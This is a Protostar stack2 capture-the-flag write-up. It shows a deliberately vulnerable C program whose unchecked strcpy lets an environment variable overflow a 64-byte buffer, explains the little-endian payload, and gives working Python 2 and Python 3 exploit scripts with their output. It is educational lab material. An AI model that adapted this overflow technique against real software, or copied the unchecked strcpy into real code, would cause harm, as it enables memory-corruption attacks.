Protostar——stack2

Introduction

  This exercise takes its input from an environment variable rather than from argv, so the exploit has to place a value longer than 64 bytes in the environment variable GREENIE before launching the program.

Source code


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx(); the original source omits this header and relies on an implicit declaration */

int main(int argc, char **argv)
{
  volatile int modified;   /* lies directly after buffer on the stack in this build */
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);   /* no length check: a value longer than 64 bytes overflows into modified */

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Analysis

  As the code shows, the program first reads the environment variable GREENIE with getenv and stores the pointer in variable, then copies its contents into buffer with strcpy. No length check is performed, so a value longer than 64 bytes overflows the buffer on the stack. Finally it checks whether modified equals 0x0d0a0d0a.
  The payload is therefore the same shape as for stack1: 64 bytes of filler followed by the four bytes that land on modified. Because the target is little-endian x86, the integer 0x0d0a0d0a is stored in memory as the byte sequence 0a 0d 0a 0d, so those are the last four bytes the payload has to write, in that order.
  The only new question is how to set an environment variable to non-printable characters from Python.

Writing the exploit

  The environment can be set through os.environ in the os module, but the value must be a string, and 0x0a and 0x0d (line feed and carriage return) are not printable characters that can be typed literally into the script. One way around this is to write the whole payload as a hex string and convert it to raw bytes with the Python 2 str.decode("hex") method (Python 3 has no such method; there bytes.fromhex or an escape such as "\x0a" is used instead). The code is as follows:

import os

# Python 2: str.decode("hex") turns the hex string into raw bytes.
# 64 bytes of 'a' (0x61) fill buffer[64]; the next four bytes overwrite
# modified and read back as 0x0d0a0d0a on the little-endian x86 target.
payload = "61" * 64 + "0a0d0a0d"
os.environ["GREENIE"] = payload.decode("hex")
cmd = "/opt/protostar/bin/stack2"
os.system(cmd)

Result:

$ python exploit2.py
you have correctly modified the variable
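The same exploit in Python 3, as an added example that is not part of the original writeup. It assumes what the analysis above assumes (a 64-byte buffer with modified directly after it on a little-endian x86 target) and the binary path the writeup uses; the function names and the environment-safety check are my own. Instead of str.decode("hex") it builds the last four bytes with struct.pack("<I", ...), so the endianness is explicit, checks how the program will read them back before running anything, and passes the raw bytes to the child through os.environb, which is how Python 3 hands non-printable bytes to a subprocess environment.

```python
import os
import struct
import subprocess

BUFFER_SIZE = 64                       # char buffer[64] in stack2.c
TARGET = 0x0d0a0d0a                    # value main() compares modified against
BINARY = "/opt/protostar/bin/stack2"   # path from the writeup (assumed)


def build_payload(fill_len=BUFFER_SIZE, target=TARGET):
    """Return the bytes to place in GREENIE.

    The first fill_len bytes fill buffer; the next four land on modified,
    which sits directly after the buffer on this target (assumption from the
    writeup).  struct.pack("<I") emits the low byte first, so 0x0d0a0d0a
    becomes the memory order 0a 0d 0a 0d.
    """
    return b"a" * fill_len + struct.pack("<I", target)


def modified_as_seen_by_program(payload, offset=BUFFER_SIZE):
    """Interpret the four bytes that overwrite modified the way the 32-bit
    program does (little-endian int), so the value can be checked before
    the binary is run."""
    return struct.unpack("<I", payload[offset:offset + 4])[0]


def payload_is_env_safe(payload):
    """An environment value is a C string: a NUL byte would terminate it
    early (and Python refuses to store one), so reject it up front.
    Line feed and carriage return are fine in an environment value."""
    return b"\x00" not in payload


def run(payload, binary=BINARY):
    """Launch the target with GREENIE set to the raw payload bytes.

    os.environb is the bytes view of the environment (POSIX only); passing a
    bytes-valued env dict lets subprocess hand non-printable bytes to the
    child without any str.decode("hex") step.
    """
    env = dict(os.environb)
    env[b"GREENIE"] = payload
    return subprocess.run([binary], env=env, capture_output=True).stdout


if __name__ == "__main__":
    p = build_payload()
    assert payload_is_env_safe(p)
    print("modified will read as 0x%08x" % modified_as_seen_by_program(p))
    if os.path.exists(BINARY):
        print(run(p).decode(errors="replace"))
    else:
        print("%s not found; run this inside the Protostar VM" % BINARY)
```

Because the only input path is getenv, nothing else in the environment has to be controlled here; the check in payload_is_env_safe matters for other targets, where a wanted value contains a 0x00 byte and therefore cannot be delivered through an environment variable at all.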
